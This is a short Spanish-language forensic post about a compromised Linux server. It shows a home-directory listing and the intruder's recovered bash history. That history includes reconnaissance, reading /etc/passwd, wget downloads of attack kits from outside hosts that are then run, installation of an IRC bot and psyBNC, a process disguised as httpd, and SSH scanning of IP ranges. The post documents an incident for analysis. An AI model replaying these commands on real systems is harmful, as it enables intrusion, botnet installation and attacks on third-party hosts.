Historia de un Servidor Comprometido

Add Log

ls -al /home/info

drwxr-xr-x 6 root root 4096 Mar 13 17:40 ..

-rwxr-xr-x 1 info mailusers 655360 May 26 2005 2004

-rw-r--r-- 1 info mailusers 269190 Jan 9 08:42 2004.TGZ

-rw-r--r-- 1 info mailusers 522574 Feb 22 15:40 alex.tgz

-rw------- 1 info mailusers 1733 Mar 12 21:08 .bash_history

drwxr-xr-x 4 info mailusers 4096 Mar 12 11:47 emech

-rw-r--r-- 1 info mailusers 233421 Mar 8 20:56 emech.tgz

drwxr-xr-x 3 info mailusers 4096 Jul 15 2007 psybnc-linux <<<<< psybnc?

-rw-r--r-- 1 info mailusers 568152 Sep 22 03:27 psybnc-linux.tgz

drwxr-xr-x 2 info mailusers 4096 Mar 12 18:48 ssh

-rw-r--r-- 1 info mailusers 754228 Mar 6 21:22 ssh1.tgz

cat .bash_history

w

cat /etc/hosts

w

ps x

ls -a

uname -a

wget http://nasa.undernet.nm.ru/2004.TGZ

tar zxvf 2004.TGZ

chmod +x 204

chmod +x 2004

./2004

uname -a

cat /etc/issue

ls -a

cat /etc/passwd

cd /tmp

ls -a

cd .webmin

ls -a

cd /dev/shm

ls -a

cat /proc/cpuinfo

wget http://ethical.ro/alex.tgz

tar zxvf alex.tgz

cd ". "

./linux

chmod +x *

./linux

ls -a

cd /tmp

wget http://ethical.ro/alex.tgz

wget http://ethical.ro/emech.tgz

tar zxvf emech.tgz

cd emech

ls -a

rm -rf cyc.set

nano cyc.acc

nano cyc.acc.2

nano cyc.acc.3

nano cyc.acc.4

nano cyc.acc.5

wget http://ethical.ro/cyc.set

chmod +x *

killall -9 linux

./httpd

wget http://ftp.rz.tu-bs.de/pub/mirror/knoppix/knoppix-cd/KNOPPIX_V5.1.1CD-2007-01-04-DE.iso

wget ftp://ftp.kernel.org/pub/linux/kernel/v2.6/linux-2.6.9.tar.gz

wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

ps x

w

ps x

w

pwd

cd

ls -a

wget http://ethical.ro/ssh1.tgz

tar zxvf ssh1.tgz <<<<

cd ssh

./a 207.97

./a 210.97

./a 200.105

./a 62.2

./a 132.230

./a 190.66

./a 200.81

cat /etc/issue

w

uname -a

./a 220.34

./a 220.134